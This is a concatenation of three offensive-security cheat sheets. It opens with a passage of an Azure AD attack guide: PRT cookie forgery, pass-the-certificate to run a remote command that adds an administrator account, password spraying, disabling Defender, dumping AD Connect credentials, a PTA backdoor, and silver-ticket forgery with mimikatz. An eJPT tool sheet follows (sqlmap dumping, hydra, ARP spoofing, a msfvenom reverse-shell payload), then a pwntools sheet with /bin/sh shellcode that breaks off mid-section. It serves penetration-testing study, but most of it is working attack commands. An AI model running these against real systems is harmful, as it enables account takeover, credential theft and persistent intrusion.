Mimikatz> dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /Prt:<PRT>
```
```powershell
# Generate a JWT
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
PS AADInternals> $PRT_OF_USER = '...'
PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="}
PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER))
PS AADInternals> $ClearKey = "XXYYZZ..."
PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce
eyJ0eXAiOiJKV1QiL...
```
The `<Signed JWT>` (JSON Web Token) can be used as PRT cookie in a (anonymous) browser session for https://login.microsoftonline.com/login.srf.
Edit the Chrome cookie (F12) -> Application -> Cookies with the values:
```powershell
Name: x-ms-RefreshTokenCredential
Value: <Signed JWT>
HttpOnly: √
```
:warning: Mark the cookie with the flags `HTTPOnly` and `Secure`.
## Pass The Certificate
```ps1
Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose
Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert
# Require the PRT, TenantID, Context and DerivedKey
& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId <TENANT-ID> --prt <PRT> --userName <Username>@<TENANT NAME>.onmicrosoft.com --hexCtx <HEX-CONTEXT> --hexDerivedKey <HEX-DERIVED-KEY>
# PFX saved with the name <Username>@<TENANT NAME>.onmicrosoft.com.pfx and password AzureADCert
```
Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine
https://github.com/morRubin/AzureADJoinedMachinePTC
```ps1
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10
python Main.py --usercert C:\Users\Username\Documents\username\<USERNAME>@<TENANT NAME>.onmicrosoft.com.pfx --
certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add"
```
## Intunes Administration
Requirements:
* **Global Administrator** or **Intune Administrator** Privilege : `Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"`
1. Login into https://endpoint.microsoft.com/#home or use Pass-The-PRT
2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune
3. Go to **Scripts** and click on **Add** for Windows 10.
4. Add a **Powershell script**
5. Specify **Add all users** and **Add all devices** in the **Assignments** page.
:warning: It will take up to one hour before you script is executed !
## Dynamic Group Membership
Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}`
Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")`
Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group
1. Open user's profile, click on **Manage**
2. Click on **Resend** invite and to get an invitation URL
3. Set the secondary email
```powershell
PS> Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT NAME>.onmicrosoft.com -Verbose
```
## Administrative Unit
> Administrative Unit can reset password of another user
```powershell
PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl
PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose
```
## Deployment Template
```powershell
PS Az> Get-AzResourceGroup
PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP
# Export
PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <RESOURCE GROUP> -DeploymentName <DEPLOYMENT NAME>
cat <DEPLOYMENT NAME>.json # search for hardcoded password
cat <PATH TO .json FILE> | Select-String password
```
## Application Proxy
```powershell
# Enumerate application that have Proxy
PS C:\Tools> Get-AzureADApplication | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"}
PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1
PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <OBJECT-ID>
```
## Conditional Access
* Bypassing conditional access by copying User-Agent (Chrome Dev Tool > Select iPad Pro, etc)
* Bypassing conditional access by faking device compliance
```powershell
# AAD Internals - Making your device compliant
# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache
# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
# Marking device compliant - option 1: Registering device to Intune
# Get an access token for Intune MDM and save to cache (prompts for credentials)
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache
# Join the device to Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
# Start the call back
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
```
## Azure AD
With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD.
1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/)
2. Change your browser URL to: https://azure.microsoft.com/
3. Pick the account from the active sessions
4. Select Azure Active Directory and enjoy!
### Azure AD vs Active Directory
| Active Directory | Azure AD |
|---|---|
| LDAP | REST API'S |
| NTLM/Kerberos | OAuth/SAML/OpenID |
| Structured directory (OU tree) | Flat structure |
| GPO | No GPO's |
| Super fine-tuned access controls | Predefined roles |
| Domain/forest | Tenant |
| Trusts | Guests |
* Password Hash Syncronization (PHS)
* Passwords from on-premise AD are sent to the cloud
* Use replication via a service account created by AD Connect
* Pass Through Authentication (PTA)
* Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text
* Connect Windows Server AD to Azure AD using Federation Server (ADFS)
* Dir-Sync : Handled by on-premise Windows Server AD, sync username/password
* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large
* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large
* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large
* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large
### Password Spray
> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds
```powershell
git clone https://github.com/dafthack/MSOLSpray
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
# UserList - UserList file filled with usernames one-per-line in the format "[email protected]"
# Password - A single password that will be used to perform the password spray.
# OutFile - A file to output valid results to.
# Force - Forces the spray to continue and not stop when multiple account lockouts are detected.
# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.
```
### Convert GUID to SID
The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id.
```powershell
GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
```
For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`
## Azure AD Connect
Check if Azure AD Connect is installed : `Get-ADSyncConnector`
* For **PHS**, we can extract the credentials
* For **PTA**, we can install the agent
* For **Federation**, we can extract the certificate from ADFS server using DA
```powershell
PS > Set-MpPreference -DisableRealtimeMonitoring $true
PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents
PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals
PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
PS > Get-AADIntSyncCredentials
# Get Token for SYNC account and reset on-prem admin password
PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
PS > Get-AADIntUser -UserPrincipalName [email protected] | select ImmutableId
PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
```
1. Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule`
2. Install a PTA Backdoor
```powershell
PS AADInternals> Install-AADIntPTASpy
PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
```
### Azure AD Connect - Password extraction
Credentials in AD Sync : C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
Tool | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally
--- | --- | --- | --- | ---
ADSyncDecrypt | Yes | Yes | No | No
ADSyncGather | Yes | No | No | Yes
ADSyncQuery | No (network RPC calls only) | No | Yes | Yes
```powershell
git clone https://github.com/fox-it/adconnectdump
# DCSync with AD Sync account
```
### Azure AD Connect - MSOL Account's password and DCSync
You can perform **DCSync** attack using the MSOL account.
Requirements:
* Compromise a server with Azure AD Connect service
* Access to ADSyncAdmins or local Administrators groups
Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account:
* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
### Azure AD Connect - Seamless Single Sign On Silver Ticket
> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
> Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD.
:warning: The password of the AZUREADSSOACC account never changes.
Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure
1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`.
```powershell
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
```
2. AAD logon name of the user we want to impersonate, e.g. `[email protected]`. This is typically either his userPrincipalName or mail attribute from the on-prem AD.
3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`.
4. Create the Silver Ticket and inject it into Kerberos cache:
```powershell
mimikatz.exe "kerberos::golden /user:elrond
/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
```
5. Launch Mozilla Firefox
6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com`
7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty.
# References
* [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
* [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!](https://www.youtube.com/watch?v=51FSvndgddk&list=WL)
* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94)
* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html)
* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/)
* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/)
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20)
* [Windows Azure Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE)
* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f)
* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
# ejpt-cheatsheet
## Nmap
___
#### Ping Sweep
```sh
nmap -sn <CIDR Notation> #Finding alive IP addresses in the subnet
```
You can also perform ping sweep using fping tool
```
fping -a -g 10.54.12.0/24 2>/dev/null
```
Now you need to find open ports on each alive IP, you can perform this using two methods
#### METHOD - 1
Perform aggressive scan on all ports which might do not required to be scanned. This could cost you time and give results which might not be useful.
```sh
nmap -p- -A -Pn -iL hosts.txt # hosts.txt file contains the alive host addresses
```
#### METHOD - 2
This method first find the open ports and after this you can perform aggressive scan on particular port. This method do not probe all the available ports blindly and you can choose which port might be useful to you to scan.
```sh
nmap -p- -T4 -Pn -vv -iL hosts.txt # This will give you all the open ports on hosts provided using hosts.txt file
nmap -p<ports> -A -Pn -vv <IP> # This will only probe ports selected by you for particular IP
```
## Analyzing HTTP and HTTPS
___
#### HTTP
```sh
nc -v www.abc.com 80 # After pressing enter you are prompted to send some data
Type two lines given below and press enter two times to get http response
GET / HTTP/1.1
Host: www.abc.com
```
#### HTTPs
```sh
openssl s_client -connect hack.me 443 # Establish ssl connection
```
After establishing ssl connection you can proceed like nc prompt
## Checking Routes and Adding Manual Routes
___
#### Checking Routes
```
ip route # Checking defined routes in linux
route # Checking defined routes in linux
route print # Checking defined routes in windows
```
#### Adding Manual Routes
```sh
ip route add <subnet> via <gateway or router address>
```
for example,
```sh
ip route add 192.168.222.0/24 via 10.172.24.1 # Here 10.172.24.1 is the address of the gateway for subnet 192.168.222.0/24
```
## Finding MAC Addresses
___
```
ipconfig /all # windows
ifconfig # *nix OSs
ip addr # linux
```
## Checking ARP Cache
___
```
arp -a # Windows
arp # *nix OSs
ip neighbour # Linux
```
## Checking for Listening Ports on a Host
___
```
netstat -ano # Windows
netstat -tunp # linux
```
## SQLmap
___
#### Checking for existence of SQL injection
```sh
sqlmap -u ‘http://example.com/view.php?id=1141’ -p id # GET Method
sqlmap -u ‘http://example.com/view.php’ --data <POST String> -p <parameter> # POST Method
```
If vulnerable parameter found then you can proceed with extraction of data from database
```sh
sqlmap -u ‘http://example.com/view.php?id=1141’ --dbs # Getting database names
sqlmap -u ‘http://example.com/view.php?id=1141’ -D <DB_name> --tables # Getting table names
sqlmap -u ‘http://example.com/view.php?id=1141’ -D <db_name> -T <tbl_name> --columns # Getting columns
sqlmap -u ‘http://example.com/view.php?id=1141’ -D <DB_name> -T <tbl_name> -C <column_name_comma_separate> --dump # To dump whole table remove column specification from the command and use only --dump option
```
## John-The-Ripper
___
```sh
john --list=formats
john -incremental -users:<users list> <file to crack> # if you want to crack only certain users from the password database such as /etc/shadow file
john --show crackme # Check cracked password after completion of cracking session, where crackme is the password database file
john -wordlist=<wordlist> <file to crack>
john -wordlist=<wordlist> -rules <file to crack> # rules are used for cracking mangling words such as for cat mangling words could be c@t,caT,CAT,CaT
```
## Hydra
___
```sh
hydra -U ftp # hydra uses module for each service to attack. To get information about a module this command can be used
hydra -L users.txt -P pass.txt <service://server> <options>
hydra -l admin -P pass.txt -f ftp://10.10.10.10 # Stop attacking on finding first successful hit for user admin
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:Incorrect credentials" -f -V # Attacking http post form
```
## Hashcat
___
```sh
hashcat -m 0 -a 0 exam.hash file.dict
hashcat -m 0 -a 0 exam.hash file.dict -r rule/custom.rule # here rule file contains the rules to creat mangling word such as p@ssword, PaSSworD https://hashcat.net/wiki/doku.php?id=rule_based_attack
hashcat -m 0 -a 3 exam.hash ?l?l?l?l?l?a # https://hashcat.net/wiki/doku.php?id=mask_attack
```
## SMB Enumeration
___
#### enum4linux
```sh
enum4linux -a <ip> # Enumerating using enum4linux tool
```
#### smbclient
```sh
smbclient -L //IP -N # Checking for available shares
smbclient //<target IP>/IPC$ -N # Connecting to a share
```
#### nmap scripts
```sh
nmap -p445 --script=smb-vuln-* <IP> -v # This will run all the smb-vuln scripts, if you want to run only few scripts then you can check other available scripts in /usr/share/nmap/scripts
```
## Checking for anonymous FTP
___
```sh
ftp <IP> # enter 'anonymous' as username and password
```
## ARP Poisoning
___
```sh
echo 1 > /proc/sys/net/ipv4/ip_forward # enabling Linux Kernel IP Forwarding, to enable forwarding packet to real destination host
arpspoof -i <interface> -t <target> -r <host> # if arpspoof do not work then install dsniff which includes this tool also
```
## MySQL
___
If you find mysql information then you can try connecting to mysql service remotely.
```sh
mysql -u <user> -p<password> -h <IP> -D <dbname>
```
## Directory busting
___
#### dirb
```sh
dirb http://<IP>/
dirb http://<IP>/ <dictionary_file_path> # Use dictionary other than default one
dirb http://<IP>/dir -u admin:admin # When you want to bust recursively but a dir asks for username password which you know already
```
#### gobuster
```sh
gobuster dir --url http://<IP>/ --wordlist=<wordlist_file_path> # -t <value> for more threads
gobuster dir --url http://<IP>/dir --wordlist=<wordlist_file_path> -U username -P password
```
## MsfVenom Payload Creation
___
```sh
msfvenom -p <payload_path> LHOST=<IP> LPORT=<PORT> -f <format> -o shell
```
Check [this](https://netsec.ws/?p=331) for some useful payloads
## Meterpreter Autoroute
___
```
meterpreter> run autoroute -s <subnet>
meterpreter > run autoroute -p # show active route table
```
# Pwntools Cheatsheet
1. [Program Interaction](#program-interaction)
2. [Environment and Contexts](#environment-and-contexts)
3. [Logging and Output](#logging-and-output)
4. [Encoding, Packing and Utility](#encoding-packing-and-utility)
5. [Assembly and Shellcraft](#assembly-and-shellcraft)
6. [ELFs, Strings and Symbols](#elfs-strings-and-symbols)
7. [Return Oriented Programming](#return-oriented-programming)
8. [SROP and Sigreturn Frames](#srop-and-sigreturn-frames)
9. [Format String Exploits](#format-string-exploits)
<a name="program-interaction"></a>
## 1. Program Interaction
```py
# process objects can be created from a local binary, or created
# from a remote socket
p = process('./target')
p = remote('127.0.0.1', 1337)
```
```py
# environment variables and command line arguments can also be passed
# to the target binary at runtime
p = process(['./target', '--arg1', 'some data'], env={'env1': 'some data'})
```
```py
# you can attach a gdb instance to your already running process
p = process('./target')
gdb.attach(p)
# you can also start the process running under gdb, disable ASLR,
# and send gdb script at startup
p = gdb.debug('./target', aslr=False, gdbscript='b *main+123')
```
```py
# writing data to the process `stdin`
p.write(b'aaaa') # p.send(b'aaaa')
p.writeline(b'aaaa') # p.sendline(b'aaaa'), p.write(b'aaaa' + b'\n')
# reading data from the process `stdout`
p.read(123) # p.recv(123)
p.readline() # p.recvline(), p.readuntil('\n')
p.readuntil('some string') # p.recvuntil('some string')
p.readall() # p.recvall()
p.clean(1) # like `readall` but with a timeout
# p.readuntil('some string') ; p.write(b'aaaa')
p.writeafter('some string', b'aaaa') # p.sendafter('some string', b'aaaa')
# p.readuntil('some string') ; p.writeline(b'aaaa')
p.writelineafter('some string', b'aaaa') # p.sendlineafter('some string', b'aaaa')
# interacting with the process manually
p.interactive()
# waiting for the process to finish
p.wait()
```
```py
# you can also use pwntools tubes in python's `with` specifier
with process('./target') as p:
# interact with process here, when done `p.close()` is called
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="environment-and-contexts"></a>
## 2. Environment and Contexts
```py
# this list of context values is not exhaustive, these are
# just the ones that I use the most often
# target architecture (default 'i386')
# valid values are 'aarch64', 'arm', 'i386', and 'amd64'
# note that this is very important when writing assembly,
# packing integers, and when building rop chains
context.arch = 'amd64'
# endianness (default 'little')
# valid values are 'big', and 'little'
context.endian = 'big'
# log verbosity (default 'info')
# valid values are 'debug', 'info', 'warn', and 'error'
context.log_level = 'error'
# signedness (default 'unsigned')
# valid values are 'unsigned', and 'signed'
context.sign = 'signed'
```
```py
# you can also update multiple context values at once with the
# `clear` or `update` functions
context.clear(arch='amd64', log_level='error')
context.update(arch='amd64', log_level='error')
```
```py
# pwntools also allows you to use what are called 'scoped'
# contexts, utilising python's `with` specifier
with context.local(log_level='error'):
# do stuff
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="logging-and-output"></a>
## 3. Logging and Output
```py
# the most basic logging utilities are below
log.warn('a warning message') # -> [!] a warning message
log.info('some information') # -> [*] some information
log.debug('a debugging message') # -> [DEBUG] a debugging message
```
```py
# logging errors will trigger an exception in addition
# to printing some output
log.error('an error occurred')
'''
[ERROR] an error occurred
---------------------------------------------------------------------------
PwnlibException Traceback (most recent call last)
<ipython-input-10-5fe862ad5f5b> in <module>
----> 1 log.error('an error occurred')
/usr/local/lib/python3.9/dist-packages/pwnlib/log.py in error(self, message, *args, **kwargs)
422 """
423 self._log(logging.ERROR, message, args, kwargs, 'error')
--> 424 raise PwnlibException(message % args)
425
426 def exception(self, message, *args, **kwargs):
PwnlibException: an error occurred
'''
```
```py
# debug messages work a little differently than the
# other log levels, by default they're disabled
context.log_level = 'debug'
# they will also trigger on a lot of normal functions
# if the log level is set to debug
asm('nop')
'''
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python3.9/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
nop
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-gl2k0o4t/step2 /tmp/pwn-asm-gl2k0o4t/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-gl2k0o4t/step3 /tmp/pwn-asm-gl2k0o4t/step4
'''
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="encoding-packing-and-utility"></a>
## 4. Encoding, Packing and Utility
```py
# pwntools provides functions for converting to / from
# hexadecimal representations of byte strings
enhex(b'/flag') # = '2f666c6167'
unhex('2f666c6167') # = b'/flag'
# pwntools provides functions for converting to / from
# base64 representations of byte strings
b64e(b'/flag') # = 'L2ZsYWc='
b64d('L2ZsYWc=') # = b'/flag'
```
```py
# you can also find functions for calculating md5 and sha1
# hashes within the pwntools library
md5sumhex(b'hello') # = '5d41402abc4b2a76b9719d911017c592'
md5filehex('./some-file') # = '2b00042f7481c7b056c4b410d28f33cf'
sha1sumhex(b'hello') # = 'aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d'
sha1filehex('./some-file') # = '7d97e98f8af710c7e7fe703abc8f639e0ee507c4'
```
```py
# converting from integer representations
p8(0x41) # = b'\x41'
p16(0x4142) # = b'\x42\x41'
p32(0x41424344) # = b'\x44\x43\x42\x41'
p64(0x4142434445464748) # = b'\x48\x47\x46\x45\x44\x43\x42\x41'
# converting to integer representations
u8(b'\x41') # = 0x41
u16(b'\x42\x41') # = 0x4142
u32(b'\x44\x43\x42\x41') # = 0x41424344
u64(b'\x48\x47\x46\x45\x44\x43\x42\x41') # = 0x4142434445464748
```
```py
# you can also specify endianness with the (un)packing functions
p64(0x4142434445464748, endian='big') # = b'\x41\x42\x43\x44\x45\x46\x47\x48
u64(b'\x41\x42\x43\x44\x45\x46\x47\x48', endian='big') # = 0x4142434445464748
```
```py
# pwntools also provides a `pack` and `unpack` functions for data of
# atypical or unusual length
pack(0x414243, 24) # = b'\x43\x42\x41'
unpack(b'\x41\x42\x43', 24) # = 0x434241
```
```py
# a leak we've captured from the process `stdout`
leak = b'0\xe1u65\x7f'
# we can use pwntools' `unpack` function to convert it to
# an integer representation
leak = unpack(leak, 'all') # leak = 139866523689264 = 0x7f353675e130
```
```py
# pwntools also provides functions for generating cyclic sequences
# of bytes to find various offsets in memory
cyclic(16) # = b'aaaabaaacaaadaaa'
cyclic(16, n=8) # = b'aaaaaaaabaaaaaaa'
cyclic_find(0x61616164) # = 12
cyclic_find(0x6161616161616162, n=8) # = 8
```
```py
# you can also print hexdumps of byte strings
print(hexdump(data))
'''
00000000 65 4c b6 62 da 4f 1d 1b d8 44 a6 59 a3 e8 69 2c │eL·b│·O··│·D·Y│··i,│
00000010 09 d8 1c f2 9b 4a 9e 94 14 2b 55 7c 4e a8 52 a5 │····│·J··│·+U|│N·R·│
00000020
'''
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="assembly-and-shellcraft"></a>
## 5. Assembly and Shellcraft
The shellcraft module is massive, so maybe just [read the documentation](https://pwntools.readthedocs.io/en/latest/shellcraft.html).
```py
# you can write shellcode using the `asm` function
shellcode = asm('''
execve:
lea rdi, [rip+bin_sh]
mov rsi, 0
mov rdx, 0
mov rax, SYS_execve
syscall
bin_sh:
.string "/bin/sh"
''')
# assembly needs to be converted into bytes in order
# to be sent as part of a payload
payload = bytes(shellcode)
```
```py
# here's some assembly for a basic `execve("/bin/sh")` shellcode
shellcode = asm('''
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rsi, 0
mov rdx, 0
mov rax, SYS_execve
syscall
''')
# another way to represent this would be to use pwntools' shellcraft
# module, of which there are so many ways to do so
shellcode = shellcraft.pushstr('/bin/sh')
shellcode += shellcraft.syscall('SYS_execve', 'rsp', 0, 0)
payload = bytes(asm(shellcode))
```
```py
# or maybe you can just use pwntools' `sh` template
shellcode = shellcraft.sh()
payload = bytes(asm(shellcode))
```
```py
# you can also use gdb to debug shellcode
shellcode = '''
execve:
lea rdi, [rip+bin_sh]
mov rsi, 0
mov rdx, 0
mov rax, SYS_execve
syscall
bin_sh:
.string "/bin/sh"
'''
# converting the shellcode we wrote to an elf
elf = ELF.from_assembly(shellcode)
p = gdb.debug(elf.path)
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="elfs-strings-and-symbols"></a>
## 6. ELFs, Strings and Symbols
```py
# `ELF` objects are instantiated by providing a file name
elf = ELF('./target')
```
```py
# accessing symbols via location
elf.plt # contains all symbols located in the PLT
elf.got # contains all symbols located in the GOT
# elf.sym contains all known symbols, with preference
# given to the PLT over the GOT
elf.sym
# e.g. getting the address of the `puts` function
puts = elf.plt.puts # equivalent to elf.sym['puts']
```
```py
libc = ELF('./libc.so.6')
old_puts = libc.sym.puts # = 0x875a0
# you can modify the base address of the elf by setting its
# address parameter
libc.address = 0xdeadbeef000
# symbol locations will now be calculated relative to that
# base address provided
new_puts = libc.sym.puts # 0xdeadbf765a0 = 0xdeadbeef + 0x875a0
```
```py
libc = ELF('./libc.so.6')
# you can even find strings in elf files with the `search` function
bin_sh = next(elf.search(b'/bin/sh'))
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="return-oriented-programming"></a>
## 7. Return Oriented Programming
```py
# `ROP` objects are instantiated using an `ELF` object
elf = ELF('./target')
rop = ROP(elf)
```
```py
# specific gadgets can be found using the `find_gadget` function
pop_rax = rop.find_gadget(['pop rax', 'ret']).address
